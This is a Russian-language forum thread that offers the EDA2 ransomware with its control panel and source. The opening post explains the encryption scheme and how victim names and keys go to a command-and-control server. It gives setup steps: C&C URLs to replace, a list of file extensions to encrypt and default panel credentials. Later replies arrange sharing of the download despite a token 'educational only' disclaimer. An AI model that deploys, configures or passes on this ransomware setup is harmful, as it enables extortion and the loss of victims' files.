EDA2 Ransomware - Panel + Source

cyber23

Member
Joined
Feb 15, 2012
Messages
194
Reaction score
50
Особенности:
Использует алгоритмы RSA и AES.
Координаты с сервером Command & Control.
Использует CSPRNG.
Использование phplibsec.
Зашифрованные файлы могут быть дешифрованы в программе дешифрования с помощью ключа шифрования.
Изменяет фон рабочего стола.
Программа отправляет запрос POST на сервер C & C с переменными pcname и username.
Сервер C & C создает пару открытых и закрытых ключей RSA. Отправляет открытый ключ в программу, сохраняет закрытый ключ внутри базы данных Mysql.
Программа создает случайный ключ для алгоритма AES.
Программа шифрует файлы с помощью алгоритма AES.
Программа шифрует ключ AES с открытым ключом RSA и отправляет его на сервер C & C с запросом POST/
Сервер C & C сохраняет зашифрованный ключ AES внутри базы данных Mysql.
Применение:
У вас должен быть веб-сервер, на котором запущены Php и Mysql. Измените эту строку URL-адресом.

Примерно вот так:
String generatorUrl = "http://www.administration.com/panel/createkeys.php";
String keySaveUrl = "http://www.administration.com/panel/savekey.php";Ransom использует 2048 размер ключа RSA. Вы можете изменить его.
Расширения шифрования целевого файла могут быть изменены. Список по умолчанию:
Var validExtensions = new [] {".txt", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".jpg ".png", ".csv", ".sql", ".mdb", ".sln", ".php", ".asp", ".aspx", ".html", ".xml "," .psd "};
Измените настройки своей базы данных в db.php
Учетные данные по умолчанию для веб-панели: имя пользователя: test password: test
Вы можете использовать программу дешифрования Hidden Tear для дешифрования файлов.
Eda2 может использоваться только для образовательных целей. Не используйте его как выкуп!
| | |__ \
___ __| | __ _ ) |
/ _ \/ _` |/ _` | / /
| __/ (_| | (_| |/ /_
\___|\__,_|\__,_|____|
 

Blurryface

Reverse Engineer
Joined
Mar 26, 2017
Messages
3,653
Reaction score
36
Для чего нужен софт? Для криптации компа?
 

cyber23

Member
Joined
Feb 15, 2012
Messages
194
Reaction score
50
Для чего нужен софт? Для криптации компа?
Что тут не понятного --вымогатель по английски (Ransomware). Неужели в описании не понятно?
 

Blurryface

Reverse Engineer
Joined
Mar 26, 2017
Messages
3,653
Reaction score
36
Что тут не понятного --вымогатель по английски (Ransomware). Неужели в описании не понятно?
Ну уж извеняй, не разбираюсь в таких софтах
 

xerppp

Social Engineer
Joined
Jul 23, 2017
Messages
135
Reaction score
25
Можешь перезалить в другое место? "В данный момент, это вложение невозможно отобразить. Пожалуйста, попробуйте позже."
 

Macbox1337

Member
Joined
Feb 16, 2017
Messages
211
Reaction score
16
Можешь перезалить в другое место? "В данный момент, это вложение невозможно отобразить. Пожалуйста, попробуйте позже."
Вот , у меня остался этот софт
 

cyber23

Member
Joined
Feb 15, 2012
Messages
194
Reaction score
50
Я уже отправил ему ссыль.
 
Top